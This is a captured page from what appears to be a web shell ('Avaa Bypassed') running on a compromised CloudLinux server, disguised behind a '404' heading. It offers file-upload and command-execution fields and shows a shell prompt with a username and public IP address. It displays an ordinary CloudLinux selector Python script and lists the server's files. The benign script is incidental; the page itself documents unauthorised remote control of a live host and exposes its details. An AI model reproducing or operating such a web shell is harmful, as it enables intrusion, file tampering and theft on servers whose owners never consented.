404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@3.17.75.243: ~ $
#!/opt/cloudlinux/venv/bin/python3 -sbb
# -*- coding: utf-8 -*-
# cloudlinux-selector Utility to check Cloudlinux license
#
# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2022 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT

from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import sys

from clselector.cl_selector import CloudlinuxSelector


def main(argv):
    """
    Main run function
    """
    cll = CloudlinuxSelector()
    return cll.run(argv)


if __name__ == "__main__":
    sys.exit(main(sys.argv[1:]))

Filemanager

Name Type Size Permission Actions
activate File 2.3 KB 0755
cloudlinux-cli-user.py File 491 B 0755
cloudlinux-selector.py File 654 B 0755
cloudlinux_cli_user.py File 11.16 KB 0644
cpanel_api.py File 9.76 KB 0644
libcloudlinux.py File 27.66 KB 0644
node_wrapper File 268 B 0755
npm_wrapper File 1.69 KB 0755
python_wrapper File 568 B 0755
set_env_vars.py File 3.66 KB 0755